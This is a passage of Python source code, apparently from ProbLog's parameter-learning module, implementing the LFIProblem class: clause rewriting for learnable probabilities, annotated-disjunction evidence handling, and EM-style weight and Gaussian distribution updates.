d\n mu /= pf\n for value, weight, count in values:\n weight = float(weight)\n var += weight * count * (value - mu) ** 2\n var /= pf\n if var < eps ** 2:\n # TODO: Is this a good approach? Should also take singularity into account\n # Std is corrected to not have probabilities larger than 1\n # Pdf is multiplied with eps to translate to prob\n std = eps\n logger.debug(\"Corrected std to {}\".format(std))\n else:\n std = math.sqrt(\n var\n ) # TODO: should we make this also variance to be consistent with multivariate?\n # # print('Update: {} -> normal({},{})'.format(d, mu, std))\n # values.sort(key=lambda t: t[0])\n # for value, weight, count in values:\n # # print('({:<4}, {:7.5f}, {:<4})'.format(value, weight, count))\n return d.with_args(Constant(mu), Constant(std))\n raise ValueError(\"Distribution not supported '%s'\" % d.functor)\n\n\ndef dist_perturb(d):\n if stats is None or np is None:\n raise ProbLogError(\n \"Continuous variables require Scipy and Numpy to be installed.\"\n )\n if d.functor == \"normal\":\n if isinstance(d.args[0], Term) and d.args[0].functor == \".\":\n args = (term2list(d.args[0]), term2list(d.args[1]))\n else:\n args = d.args\n if isinstance(args[0], list): # multivariate\n mu = args[0] # type: List[float]\n ndim = len(mu)\n cov = args[1] # type: List[float]\n if len(cov) != ndim * ndim:\n raise ValueError(\"Distribution parameters do not match: {}\".format(d))\n rv = stats.multivariate_normal(mu, np.reshape(cov, (ndim, ndim)) / 10)\n mu = rv.rvs()\n dn = d.with_args(list2term(mu.tolist()), list2term(cov))\n return dn\n else: # univariate\n mu, std = map(float, d.args)\n rv = stats.norm(mu, std / 10)\n mu = float(rv.rvs())\n dn = d.with_args(Constant(mu), Constant(std))\n return dn\n raise ValueError(\"Distribution not supported '%s'\" % d.functor)\n\n\nclass LFIProblem(LogicProgram):\n def __init__(\n self,\n source,\n examples,\n max_iter=10000,\n min_improv=1e-10,\n verbose=0,\n knowledge=None,\n leakprob=None,\n propagate_evidence=True,\n normalize=False,\n log=False,\n eps=1e-4,\n **extra\n ):\n \"\"\"\n Learn parameters using LFI.\n The atoms with to be learned continuous distributions can only appear in the head of a rule.\n :param source: filename of file containing input model\n :type source: str\n :param examples: list of observed terms / value\n :type examples: list[tuple(Term, bool)]\n :param max_iter: maximum number of iterations to run\n :type max_iter: int\n :param min_improv: minimum improvement in log-likelihood for convergence detection\n :type min_improv: float\n :param verbose: verbosity level\n :type verbose: int\n :param knowledge: class to use for knowledge compilation\n :type knowledge: class\n :param leakprob: Add all true evidence atoms with the given probability\n to avoid 'inconsistent evidence' errors. This also\n allows to learn a program without constants and\n retrieve the constants from the evidence file.\n (default: None)\n :type leakprob: float or None\n :param eps: Epsilon value which is the smallest value that is used\n :type eps: float\n :param extra: catch all for additional parameters (not used)\n \"\"\"\n # logger = getLogger('problog_lfi')\n LogicProgram.__init__(self)\n self.source = source\n self._log = log\n self._eps = eps\n\n # The names of the atom for which we want to learn weights.\n self.names = []\n self.bodies = []\n self.parents = []\n\n # The weights to learn.\n # The initial weights are of type 'float'.\n # When necessary they are replaced by a dictionary [t(arg1, arg2, ...) -> float]\n # for weights of form t(SV, arg1, arg2, ...).\n self._weights = []\n\n self.examples = examples\n self.leakprob = leakprob\n self.leakprobatoms = None\n self.propagate_evidence = propagate_evidence\n self._compiled_examples = None\n\n self.max_iter = max_iter\n self.min_improv = min_improv\n self.verbose = verbose\n self.iteration = 0\n\n if knowledge is None:\n knowledge = get_evaluatable()\n self.knowledge = knowledge\n\n self.output_mode = False\n self.extra = extra\n\n self._enable_normalize = normalize\n self._adatoms = [] # list AD atoms and total probability\n self._adatomc = {} # complement of AD atom (complement that adds to prob 1.0)\n self._adparent = {} # atom representing parent of AD\n self._catoms = set() # Continuous atoms\n\n @property\n def count(self):\n \"\"\"Number of parameters to learn.\"\"\"\n return len(self.names)\n\n def add_ad(self, rem_prob, indices):\n \"\"\"\n :param rem_prob: Remaining probability that can be learned (if no fixed probabilities given, this will be one)\n :param indices: Indices of atoms that together form an annotated disjunction.\n :return: None\n \"\"\"\n self._adatoms.append((rem_prob, indices))\n for idx in indices:\n self._adatomc[idx] = [idxo for idxo in indices if idxo != idx]\n\n def count_ad(self):\n return len(self._adatoms)\n\n def append_ad(self, atom_index, ad_index=None):\n if ad_index is None:\n ad_index = -1\n self._adatoms[ad_index][1].append(atom_index)\n indices = self._adatoms[ad_index][1]\n for idx in indices:\n self._adatomc[idx] = [idxo for idxo in indices if idxo != idx]\n\n def verify_ad(self, ad_index=None):\n if ad_index is None:\n ad_index = -1\n if len(self._adatoms[ad_index][1]) == 1:\n indices = self._adatoms[ad_index][1]\n\n self._adatomc[indices[0]] = [\n -1 - indices[0]\n ] # No AD, complement is negative variable\n\n def prepare(self):\n \"\"\"Prepare for learning.\"\"\"\n self._compile_examples()\n\n def _get_weight(self, index, args, strict=True):\n index = int(index)\n weight = self._weights[index]\n if isinstance(weight, dict):\n if strict:\n return weight[args]\n else:\n return weight.get(args, 0.0)\n else:\n return weight\n\n def get_weights(self, index):\n \"\"\"Get a list of key, weight pairs for the given input fact.\n :param index: identifier of the fact\n :return: list of key, weight pairs where key refers to the additional variables\n on which the weight is based\n :rtype: list[tuple[Term, float]]\n \"\"\"\n weight = self._weights[index]\n if isinstance(weight, dict):\n return list(weight.items())\n else:\n return [(Term(\"t\"), weight)]\n\n def _set_weight(self, index, args, weight, weight_changed=None):\n # # print(self._weights)\n index = int(index)\n if not args:\n assert not isinstance(self._weights[index], dict)\n self._weights[index] = weight\n elif isinstance(self._weights[index], dict):\n # self._weights[index][args] = weight\n if weight_changed and weight_changed[index]:\n self._weights[index][Term(args.functor)] += weight\n else:\n self._weights[index][Term(args.functor)] = weight\n else:\n if index in self._catoms:\n # If new t args, perturb the distribution a bit to avoid identical ones\n weight = dist_perturb(weight)\n # TODO: Shouldn't all weights be perturbed to avoid identical updates?\n # self._weights[index] = {args: weight}\n self._weights[index] = {Term(args.functor): weight}\n # print(\"Weights\", self._weights)\n\n def _add_weight(self, weight):\n self._weights.append(weight)\n\n def _process_examples(self):\n \"\"\"Process examples by grouping together examples with similar structure.\n :return: example groups based on evidence atoms\n :rtype: dict of atoms : values for examples\n \"\"\"\n\n # value can be True / False / None\n # ( atom ), ( ( value, ... ), ... )\n\n # Simple implementation: don't add neutral evidence.\n\n # ad_groups is a dictionary of lists, each list contains an AD\n # the key\n ad_groups = list()\n for ad in self._adatoms:\n # if it's an AD group AND the total probability is 1.0\n if len(ad[1]) > 1 and ad[0] == 1.0:\n ad_list = []\n for var in ad[1]:\n ad_list.append(Term(self.names[var].functor, *self.names[var].args))\n ad_groups.append(tuple(ad_list))\n # print(\"AD Groups\\t\\t:\", ad_groups)\n\n def multiple_true(d):\n \"\"\"\n This function recognizes inconsistent evidence s.t. more than one term is True in AD.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :return: whether more than one value is True\n \"\"\"\n true_count = sum(v is True for v in d.values())\n return true_count > 1\n\n def all_false(d):\n \"\"\"\n This function recognizes inconsistent evidence s.t. all values are False in AD.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :return: whether all values are False\n \"\"\"\n # false_count should be the same as the length of d\n false_count = sum(v is False for v in d.values())\n return false_count == len(d)\n\n def all_false_except_one(d):\n \"\"\"\n This function recognizes incomplete evidence s.t.\n the non-False value in AD needs to be set to True.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :return: whether all values except one are False\n \"\"\"\n false_count = sum(v is False for v in d.values())\n the_left_is_none = bool(sum(v is None for v in d.values()))\n return (false_count == len(d) - 1) and the_left_is_none\n\n def getADtemplate(d, atom=None):\n \"\"\"\n This function gets atom's complement AD template.\n This should only be used when the AD contains non-ground terms.\n :param d: dictionary of ADs in form {term: value}\n value can be True, False, None, \"Template\"\n :param atom: an evidence\n :return: atom's complement AD template\n \"\"\"\n if atom is not None:\n temp_dict = {\n k: v\n for k, v in d.items()\n if v == \"Template\" and atom.signature != k.signature\n }\n return temp_dict\n else:\n temp_dict = {k: v for k, v in d.items() if v == \"Template\"}\n return temp_dict\n\n def add_to_ad_evidence(pair, l, ADtemplate):\n \"\"\"\n :param pair: a new pair of (atom, value)\n :param l: a list of dictionaries, all dictionaries need to have the same format\n :return:\n \"\"\"\n (k, v) = pair\n # if entry k exists, update the value with k\n for d in l:\n if k in d:\n d[k] = v\n return\n # if entry k does not exist, create a new dictionary from template\n # and instantiate it with k\n new_d = dict()\n for temp_k in ADtemplate.keys():\n new_key = Term(temp_k.functor, *k.args)\n new_d[new_key] = None\n # put v in there\n new_d[k] = v\n l.append(new_d)\n\n if self.propagate_evidence:\n result = ExampleSet()\n inconsistent = False\n # iterate over all examples given in .ev\n for index, example in enumerate(self.examples):\n ad_evidences = []\n non_ad_evidence = {}\n for ad_group in ad_groups:\n # create a dictionary to memorize what evidence is given in AD\n d = dict()\n # TODO: what if the AD contains both ground and non-ground????\n # e.g. t(_)::a; t(_)::b(X)\n for var in ad_group:\n if var.is_ground():\n d[var] = None # for ground unknown evidence\n else:\n d[var] = \"Template\" # for unground unknown evidence\n ad_evidences.append(d)\n\n # add all evidence in the example to ad_evidences\n for atom, value, cvalue in example:\n # if atom has a tunable probability to learn\n if any([atom.signature == name.signature for name in self.names]):\n # Propositional evidence\n if len(atom.args) == 0:\n # insert evidence\n for d in ad_evidences:\n if atom in d:\n d[atom] = value\n non_ad_evidence[\n atom\n ] = value # TODO: what does this capture?\n # First Order evidence\n else:\n # find the right AD dictionary : AD_dict\n AD_dict = None\n for d in ad_evidences:\n if any([atom.signature == k.signature for k in d]):\n AD_dict = d\n # if the instantiation is new, add it as a key to the dictionary\n if AD_dict and AD_dict.get(atom) is None:\n AD_dict[atom] = value\n # also add other AD parts in the dictionary with value==None\n other_ADs = getADtemplate(AD_dict, atom)\n for otherAD in other_ADs.keys():\n new_key = Term(otherAD.functor, *atom.args)\n AD_dict[new_key] = AD_dict.get(new_key, None)\n else:\n non_ad_evidence[atom] = value\n else:\n non_ad_evidence[atom] = value\n\n # grounded_ad_evidences contains all usable evidence (gound, not template)\n grounded_ad_evidences = []\n for d in ad_evidences:\n # for first order evidence dictionaries\n if \"Template\" in d.values():\n # new_ad_evidence is a list of dictionaries\n # each dictionary is a group of the AD template instantiation\n new_ad_evidence = list()\n # get template AD evidence\n ADtemplate = getADtemplate(d)\n # group all pairs according to ADtemplate\n for k, v in d.items():\n if v is not \"Template\":\n add_to_ad_evidence((k, v), new_ad_evidence, ADtemplate)\n grounded_ad_evidences += new_ad_evidence\n # for propositional evidence dictionaries\n else:\n # simply us them\n grounded_ad_evidences.append(d)\n\n # # print(grounded_ad_evidences)\n\n inconsistent_example = False\n for i, d in enumerate(grounded_ad_evidences):\n # inconsistent1 = multiple_true(d)\n inconsistent2 = all_false(d)\n add_compliment = all_false_except_one(d)\n\n if inconsistent2:\n # print(\"*** Warning: Inconsistent Evidence Detected! Ignoring this datapoint. ***\\n\")\n inconsistent_example = True\n continue\n elif add_compliment:\n for key, value in d.items():\n if value is None:\n grounded_ad_evidences[i][key] = True\n\n if not inconsistent_example and len(grounded_ad_evidences) > 0:\n # There are (fully tunable) ADs in the program\n evidence_set = set()\n for d in grounded_ad_evidences:\n for key, value in d.items():\n if value is not None:\n evidence_set.add((key, value, None))\n\n for key, value in non_ad_evidence.items():\n evidence_set.add((key, value, None))\n\n atoms, values, cvalues = zip(*evidence_set)\n # print(index, \"Push evidence\\t:\", atoms, values, cvalues, \"\\n\")\n result.add(index, atoms, values, cvalues)\n\n else:\n # (No AD case) or (Inconsistent Evidence Case)\n atoms, values, cvalues = zip(*example)\n # print(index, \"Push evidence\\t:\", atoms, values, \"\\n\")\n result.add(index, atoms, values, cvalues)\n\n return result\n else:\n # smarter: compile-once all examples with same atoms\n result = ExampleSet()\n for index, example in enumerate(self.examples):\n atoms, values, cvalues = zip(*example)\n result.add(index, atoms, values, cvalues)\n return result\n\n def _compile_examples(self):\n \"\"\"Compile examples.\"\"\"\n baseprogram = DefaultEngine(**self.extra).prepare(self)\n # print(\"\\nBase Program\\t:\")\n # print(\"\\t\" + baseprogram.to_prolog().replace(\"\\n\", \"\\n\\t\"))\n examples = self._process_examples()\n # print()\n for i, example in enumerate(examples):\n # print(\"Compiling example {}/{}\".format(i + 1, len(examples)))\n example.compile(self, baseprogram)\n self._compiled_examples = examples\n\n def _process_atom(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n result = None\n if isinstance(atom, Or):\n # Annotated disjuntions are always discrete distributions\n result = self._process_atom_discr(atom, body)\n if (\n result is None\n and atom.probability\n and isinstance(atom.probability, Term)\n and len(atom.probability.args) > 0\n ):\n cdist = atom.probability.args[0]\n if isinstance(cdist, Term) and not isinstance(cdist, Var):\n if cdist.functor in cdist_names:\n result = self._process_atom_cont(atom, body)\n if result is None:\n result = self._process_atom_discr(atom, body)\n # print(str(atom) + \" got processed to \" + str(result))\n return result\n\n def _process_atom_cont(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n logger = getLogger(\"problog_lfi\")\n atoms_out = []\n extra_clauses = []\n\n has_lfi_fact = False\n\n if atom.probability and atom.probability.functor == \"t\":\n has_lfi_fact = True\n cdist = atom.probability.args[0]\n if isinstance(cdist, Term) and cdist.functor in cdist_names:\n start_dist = cdist\n if cdist.functor == \"normal\":\n start_params = [None, None]\n try:\n if cdist.args[0].functor == \".\":\n start_params[0] = term2list(cdist.args[0]) # multivariate\n else:\n start_params[0] = float(cdist.args[0]) # univariate\n except InstantiationError:\n start_params[0] = None\n except ArithmeticError:\n start_params[0] = None\n try:\n if cdist.args[1].functor == \".\":\n start_params[1] = term2list(cdist.args[1]) # multivariate\n else:\n start_params[1] = float(cdist.args[1]) # univariate\n except InstantiationError:\n start_params[1] = None\n except ArithmeticError:\n start_params[1] = None\n else:\n start_params = None\n else:\n start_dist = None\n start_params = None\n\n # Learnable probability\n # # print('get start_value from {}'.format(cdist))\n\n # Replace anonymous variables with non-anonymous variables.\n class ReplaceAnon(object):\n def __init__(self):\n self.cnt = 0\n\n def __getitem__(self, key):\n if key == \"_\":\n self.cnt += 1\n return Var(\"anon_%s\" % self.cnt)\n else:\n return Var(key)\n\n atom1 = atom.apply(ReplaceAnon())\n prob_args = atom.probability.args[1:]\n\n # 1) Introduce a new fact\n # lfi_fact(0, t(1), 2, 3)\n # | | |\n # | | `-> Arguments for atom in head\n # | `-> Arguments for prob in head in t(_, 1)\n # `-> Identifier for original to learn term\n # TODO: naming it clfi_fact instead of lfi_fact is not really necessary\n lfi_fact = Term(\n \"clfi_fact\", Constant(self.count), Term(\"t\", *prob_args), *atom1.args\n )\n lfi_prob = Term(\n \"clfi\",\n Constant(self.count),\n Term(\"t\", *prob_args),\n atom.with_probability(),\n )\n\n # 2) Replacement atom\n replacement = lfi_fact.with_probability(lfi_prob)\n if body is None:\n new_body = lfi_fact\n else:\n new_body = body & lfi_fact\n\n # 3) Create redirection clause\n extra_clauses += [Clause(atom1.with_probability(), new_body)]\n\n # 4) Set initial weight\n if start_dist is None:\n raise ProbLogError(\"No correct initial distribution defined\")\n elif start_dist.functor == \"normal\":\n if start_params[0] is None:\n start_params[0] = Constant(random.gauss(0, 10))\n if start_params[1] is None:\n start_params[1] = Constant(\n 1000000\n ) # TODO: What is a good choice here?\n start_dist = start_dist.with_args(start_params[0], start_params[1])\n self._add_weight(start_dist)\n\n # 5) Add name\n self._catoms.add(len(self.names))\n self.names.append(atom)\n atoms_out.append(replacement)\n else:\n # TODO: process continuous distribution for not to be learned distributions\n atoms_out.append(atom)\n raise ProbLogError(\n \"Continuous distributions that do not have to be learned is not yet supported.\"\n )\n\n if has_lfi_fact:\n result = [atoms_out[0]] + extra_clauses\n else:\n if body is None:\n result = [atoms_out[0]]\n else:\n result = [Clause(atoms_out[0], body)]\n logger.debug(\"New clauses: \" + str(result))\n return result\n\n def _process_atom_discr(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n if isinstance(atom, Or):\n # Annotated disjunction\n atoms = atom.to_list()\n else:\n atoms = [atom]\n\n atoms_out = []\n extra_clauses = []\n\n has_lfi_fact = False\n prior_probability = 0.0 # Sum of prior weights in AD.\n fixed_probability = 0.0 # Sum of fixed (i.e. non-learnable) weights in AD.\n\n num_random_weights = 0\n for atom in atoms:\n if atom.probability and atom.probability.functor == \"t\":\n try:\n start_value = float(atom.probability.args[0])\n prior_probability += float(start_value)\n except InstantiationError:\n # Can't be converted to float => take random\n num_random_weights += 1\n except ArithmeticError:\n num_random_weights += 1\n elif atom.probability and atom.probability.is_constant():\n fixed_probability += float(atom.probability)\n\n random_weights = [random.random() for i in range(0, num_random_weights + 1)]\n norm_factor = (1.0 - prior_probability - fixed_probability) / sum(\n random_weights\n )\n random_weights = [r * norm_factor for r in random_weights]\n\n # First argument is probability available for learnable weights in the AD.\n self.add_ad(1.0 - fixed_probability, []) # TODO : this adds extra ad\n\n for atom in atoms:\n if atom.probability and atom.probability.functor == \"t\":\n # t(_)::p(X) :- body.\n #\n # Translate to\n # lfi(1)::lfi_fact_1(X).\n # p(X) :- lfi_body_1(X).\n # lfi_body_1(X) :- body, lfi_fact_1(X).\n # lfi_body_2(X) :- body, \\+lfi_fact_1(X).\n #\n # For annotated disjunction: t(_)::p1(X); t(_)::p2(X) :- body.\n # lfi1::lfi_fact_1(X); lfi2::lfi_fact_2(X); ... .\n # p1(X) :- lfi_body_1(X).\n # lfi_body_1(X) :- body, lfi_fact_1(X).\n # p2(X) :- lfi_body_2(X).\n # lfi_body_2(X) :- body, lfi_fact_2(X).\n # ....\n has_lfi_fact = True\n\n # Learnable probability\n try:\n start_value = float(atom.probability.args[0])\n except InstantiationError:\n start_value = None\n except ArithmeticError:\n start_value = None\n\n # Replace anonymous variables with non-anonymous variables.\n class ReplaceAnon(object): # TODO: can be defined outside of for loop?\n def __init__(self):\n self.cnt = 0\n\n def __getitem__(self, key):\n if key == \"_\":\n self.cnt += 1\n return Var(\"anon_%s\" % self.cnt)\n else:\n return Var(key)\n\n atom1 = atom.apply(ReplaceAnon())\n prob_args = atom.probability.args[1:]\n\n # 1) Introduce a new fact\n # lfi_fact = Term('lfi_fact', Constant(self.count), Term('t', *prob_args), *atom1.args)\n # lfi_body = Term('lfi_body', Constant(self.count), Term('t', *prob_args), *atom1.args)\n lfi_fact = Term(\n \"lfi_fact\", Constant(self.count), Term(\"t\", *prob_args, *atom1.args)\n )\n lfi_body = Term(\n \"lfi_body\", Constant(self.count), Term(\"t\", *prob_args, *atom1.args)\n )\n # lfi_par = Term('lfi_par', Constant(self.count_ad()), Term('t', *prob_args), *atom1.args)\n # TODO: lfi_par should be unique for rule, not per disjunct\n # lfi_par = Term('lfi_par', Constant(self.count), Term('t', *prob_args), *atom1.args)\n lfi_par = Term(\n \"lfi_par\", Constant(self.count), Term(\"t\", *prob_args, *atom1.args)\n )\n # lfi_prob = Term('lfi', Constant(self.count), Term('t', *prob_args, *atom1.args))\n lfi_prob = Term(\"lfi\", Constant(self.count), Term(\"t\"))\n\n # 2) Replacement atom\n replacement = lfi_fact.with_probability(lfi_prob)\n\n if body is None:\n new_body = Term(\"true\")\n else:\n new_body = body\n\n # 3) Create redirection clause\n\n extra_clauses += [\n Clause(atom1.with_probability(), lfi_body),\n Clause(lfi_body, lfi_par & lfi_fact),\n Clause(lfi_par, new_body),\n ]\n\n self.append_ad(len(self._weights))\n # 4) Set initial weight\n if start_value is None:\n start_value = random_weights.pop(-1)\n self._add_weight(start_value)\n else:\n self._add_weight(start_value)\n\n # 5) Add name\n self.names.append(atom)\n self.bodies.append(lfi_body)\n self.parents.append(lfi_par)\n atoms_out.append(replacement)\n else:\n atoms_out.append(atom)\n\n self.verify_ad()\n\n if has_lfi_fact:\n if len(atoms) == 1: # Simple clause\n return [atoms_out[0]] + extra_clauses\n else:\n return [AnnotatedDisjunction(atoms_out, Term(\"true\"))] + extra_clauses\n else:\n if len(atoms) == 1:\n if body is None:\n return [atoms_out[0]]\n else:\n return [Clause(atoms_out[0], body)]\n else:\n if body is None:\n body = Term(\"true\")\n return [AnnotatedDisjunction(atoms_out, body)]\n\n def _process_atom_output(self, atom, body):\n \"\"\"Returns tuple ( prob_atom, [ additional clauses ] )\"\"\"\n\n if isinstance(atom, Or):\n atoms = atom.to_list()\n else:\n atoms = [atom]\n\n transforms = defaultdict(list)\n\n clauses = []\n atoms_fixed = []\n t_args = None\n fixed_only = True\n for atom in atoms:\n if atom.probability and atom.probability.functor == \"t\":\n assert atom in self.names\n # assert (t_args is None or atom.probability.args == t_args)\n # t_args = atom.probability.args\n\n index = self.output_names.index(atom)\n weights = self.get_weights(index)\n\n for w_args, w_val in weights:\n translate = tuple(zip(atom.probability.args[1:], w_args.args))\n if isinstance(w_val, Term) and w_val.functor in cdist_names:\n # Keep the complex structure that represents the distribution\n transforms[translate].append(atom.with_probability(w_val))\n else:\n transforms[translate].append(\n atom.with_probability(Constant(w_val))\n )\n self.output_names[index] = None\n fixed_only = False\n else:\n atoms_fixed.append(atom)\n\n if not fixed_only:\n clauses = []\n for tr, atoms in transforms.items():\n tr = DefaultDict({k: v for k, v in tr})\n atoms_out = [at.apply(tr) for at in atoms] + atoms_fixed\n if len(atoms_out) == 1:\n if body is None:\n clauses.append(atoms_out[0])\n else:\n clauses.append(Clause(atoms_out[0], body.apply(tr)))\n else:\n if body is None:\n clauses.append(AnnotatedDisjunction(atoms_out, None))\n else:\n clauses.append(AnnotatedDisjunction(atoms_out, body.apply(tr)))\n return clauses\n else:\n atoms_out = atoms_fixed\n if len(atoms_out) == 1:\n if body is None:\n return [atoms_out[0]]\n else:\n return [Clause(atoms_out[0], body)]\n else:\n return [AnnotatedDisjunction(atoms_out, body)]\n\n # Overwrite from LogicProgram\n def __iter__(self):\n \"\"\"\n Iterate over the clauses of the source model.\n This object can be used as a LogicProgram to be passed to the grounding Engine.\n Extracts and processes all ``t(...)`` weights.\n This\n * replaces each probabilistic atom ``t(...)::p(X)`` by a unique atom \\\n ``lfi(i) :: lfi_fact_i(X)``;\n * adds a new clause ``p(X) :- lfi_fact_i(X)``;\n * adds a new query ``query( lfi_fact_i(X) )``;\n * initializes the weight of ``lfi(i)`` based on the ``t(...)`` specification;\n This also removes all existing queries from the model.\n Example:\n .. code-block:: prolog\n t(_) :: p(X) :- b(X).\n t(_) :: p(X) :- c(X).\n is transformed into\n .. code-block:: prolog\n lfi(0) :: lfi_fact_0(X) :- b(X).\n p(X) :- lfi_fact_0(X).\n lfi(1) :: lfi_fact_1(X) :- c(X).\n p(X) :- lfi_fact_1(X).\n query(lfi_fact_0(X)).\n query(lfi_fact_1(X)).\n If ``self.leakprobs`` is a value, then during learning all true\n examples are added to the program with the given leak probability.\n \"\"\"\n\n if self.output_mode:\n process_atom = self._process_atom_output\n self.output_names = self.names[:]\n else:\n process_atom = self._process_atom\n\n for clause in self.source:\n if isinstance(clause, Clause):\n if clause.head.functor == \"query\" and clause.head.arity == 1:\n continue\n extra_clauses = process_atom(clause.head, clause.body)\n for extra in extra_clauses:\n # print(\"RULE >>\", extra)\n yield extra\n elif isinstance(clause, AnnotatedDisjunction):\n extra_clauses = process_atom(Or.from_list(clause.heads), clause.body)\n for extra in extra_clauses:\n # print(\"RULE >>\", extra)\n yield extra\n else:\n if clause.functor == \"query\" and clause.arity == 1:\n continue\n # Fact\n extra_clauses = process_atom(clause, None)\n for extra in extra_clauses:\n # print(\"RULE >>\", extra)\n yield extra\n\n if self.leakprob is not None:\n leakprob_atoms = self._get_leakprobatoms()\n for example_atom in leakprob_atoms:\n yield example_atom.with_probability(Constant(self.leakprob))\n\n def _get_leakprobatoms(self):\n if self.leakprobatoms is not None:\n return self.leakprobatoms\n self.leakprobatoms = set()\n for examples in self.examples:\n for example, obs in examples:\n if obs:\n self.leakprobatoms.add(example)\n return self.leakprobatoms\n\n def _evaluate_examples(self):\n \"\"\"Evaluate the model with its current estimates for all examples.\"\"\"\n results = []\n i = 0\n getLogger(\"problog_lfi\").debug(\"Evaluating examples ...\")\n\n if self._log:\n evaluator = ExampleEvaluatorLog(self._weights, eps=self._eps)\n else:\n evaluator = ExampleEvaluator(self._weights, eps=self._eps)\n\n results = []\n for i, example in enumerate(self._compiled_examples):\n try:\n results.append(evaluator(example))\n except InconsistentEvidenceError:\n # print(\"Ignoring example {}/{}\".format(i + 1, len(self._compiled_examples)))\n getLogger(\"problog_lfi\").warning(\n \"Ignoring example {}/{}\".format(i + 1, len(self._compiled_examples))\n )\n # for result in results:\n # # print(result)\n\n return list(chain.from_iterable(results))\n\n # return list(chain.from_iterable(map(evaluator, self._compiled_examples)))\n\n def _update(self, results):\n \"\"\"Update the current estimates based on the latest evaluation results.\"\"\"\n # print(\"_update\", results)\n logger = getLogger(\"problog_lfi\")\n # fact_marg = defaultdict(DensityValue)\n fact_marg = defaultdict(int)\n fact_body = defaultdict(int)\n fact_par = defaultdict(int)\n fact_count = defaultdict(int)\n fact_values = dict()\n score = 0.0\n for m, pEvidence, result, p_values in results:\n # if not isinstance(pEvidence, DensityValue):\n # pEvidence = DensityValue.wrap(pEvidence)\n # print(\"_update.result\", result)\n par_marg = dict()\n # # print('p_values', p_values)\n for fact, value in result.items():\n # print(fact, value)\n index = fact.args[0:2]\n # if not index in fact_marg:\n # fact_marg[index] = polynomial.polynomial.polyzero\n # if not isinstance(value, DensityValue):\n # value = DensityValue.wrap(value)\n if fact.functor == \"lfi_fact\":\n fact_marg[index] += value * m\n if fact.functor == \"lfi_body\":\n fact_body[index] += value * m\n elif fact.functor == \"lfi_par\":\n if index in par_marg:\n if par_marg[index] != value:\n raise Exception(\n \"Different parent margs for {}={} and previous {}={}\".format(\n fact, value, index, par_marg[index]\n )\n )\n par_marg[index] = value\n for o_index in self._adatomc[index[0]]:\n if o_index >= 0:\n par_marg[(o_index, index[1])] = value\n fact_count[index] += m\n if fact in p_values:\n # # print('fact in p_values', fact)\n k = (index[0], index[1])\n if k not in fact_values:\n fact_values[k] = (self._get_weight(index[0], index[1]), list())\n p_value = p_values[fact]\n fact_values[k][1].append((p_value, value, m))\n for index, value in par_marg.items():\n # print(\"value[{}]={} ({})\".format(index, value, m))\n fact_par[index] += value * m\n try:\n if isinstance(pEvidence, DensityValue):\n pEvidence = pEvidence.value()\n score += math.log(pEvidence)\n except ValueError:\n logger.debug(\"Pr(evidence) == 0.0\")\n # raise ProbLogError('Inconsistent evidence when updating')\n\n update_list = fact_body\n\n # indices_set = set()\n # for index in update_list:\n # indices_set.add(index[0])\n weight_changed = [False] * len(self.names)\n # print(\"Weight_changed List:\", weight_changed)\n for index in update_list:\n k = (index[0], index[1])\n if k in fact_values:\n logger.debug(\n \"Update continuous distribution {}: \".format(index)\n + \", \".join([str(v) for v in fact_values[k]])\n )\n self._set_weight(\n index[0],\n index[1],\n dist_prob_set(\n *fact_values[k], eps=self._eps, weight_changed=weight_changed\n ),\n )\n weight_changed[int(index[0])] = True\n else:\n\n if float(fact_body[index]) == 0.0:\n prob = 0.0\n else:\n # print(fact_par[index])\n temp = dict()\n ids, vars = zip(*list(fact_par.keys()))\n for id in set(ids):\n temp[id] = 0\n for var in set(vars):\n temp[id] += fact_par[(id, var)]\n prob = float(fact_body[index]) / float(temp[index[0]])\n # prob = float(fact_body[index]) / float(fact_par[index])\n logger.debug(\n \"Update probabilistic fact {}: {} / {} = {}\".format(\n index, fact_body[index], fact_par[index], prob\n )\n )\n self._set_weight(\n index[0], index[1], prob, weight_changed=weight_changed\n )\n weight_changed[int(index[0])] = True\n\n if self._enable_normalize:\n self._normalize_weights()\n\n return score\n\n def _normalize_weights(self):\n # TODO: too late here, AD should be taken into account in _update\n # Derivation is sum(all values for var=k) / sum(all values for i sum(all values for var=i))\n # print(\"_adatoms\", self._adatoms)\n\n for available_prob, idx in self._adatoms:\n if len(idx) == 1:\n continue\n keys = set()\n for i in idx:\n for key, val in self.get_weights(i):\n keys.add(key)\n if len(keys) > 1:\n try:\n keys.remove(Term(\"t\"))\n except KeyError:\n pass\n\n keys = list(keys)\n if len(keys) > 1:\n w = 0.0\n for key in keys:\n w += sum(self._get_weight(i, key, strict=False) for i in idx)\n if w != 0:\n n = (\n available_prob / w\n ) # Some part of probability might be taken by non-learnable weights in AD.\n else:\n n = available_prob\n for i in idx:\n self._set_weight(\n i,\n list(self._weights[i].keys())[0],\n self._get_weight(\n i, list(self._weights[i].keys())[0], strict=False\n )\n * n,\n )\n else:\n w = sum(self._get_weight(i, keys[0], strict=False) for i in idx)\n if w != 0:\n n = (\n available_prob / w\n ) # Some part of probability might be taken by non-learnable weights in AD.\n else:\n n = available_prob\n for i in idx:\n self._set_weight(\n i, keys[0], self._get_weight(i, keys[0], strict=False) * n\n )\n\n def step(self):\n self.iteration += 1\n results = self._evaluate_examples()\n getLogger(\"problog_lfi\").info(\"Step {}: {}\".format(self.iteration, results))\n return self._update(results)\n\n def get_model(self):\n self.output_mode = True\n lines = []\n for l in self:\n lines.append(\"%s.\" % l)\n lines.append(\"\")\n self.output_mode = False\n return \"\\n\".join(lines)\n\n def run(self):\n self.prepare()\n\n getLogger(\"problog_lfi\").info(\"Weights to learn: %s\" % self.names)\n getLogger(\"problog_lfi\").info(\"Bodies: %s\" % self.bodies)\n getLogger(\"problog_lfi\").info(\"Parents: %s\" % self.parents)\n getLogger(\"problog_lfi\").info(\"Initial weights: %s\" % self._weights)\n delta = 1000\n prev_score = -1e10\n # TODO: isn't this comparing delta i logprob with min_improv in prob?\n while self.iteration < self.max_iter and (delta < 0 or delta > self.min_improv):\n score = self.step()\n getLogger(\"problog_lfi\").info(\n \"Weights after iteration %s: %s\" % (self.iteration, self._weights)\n )\n getLogger(\"problog_lfi\").info(\n \"Score after iteration 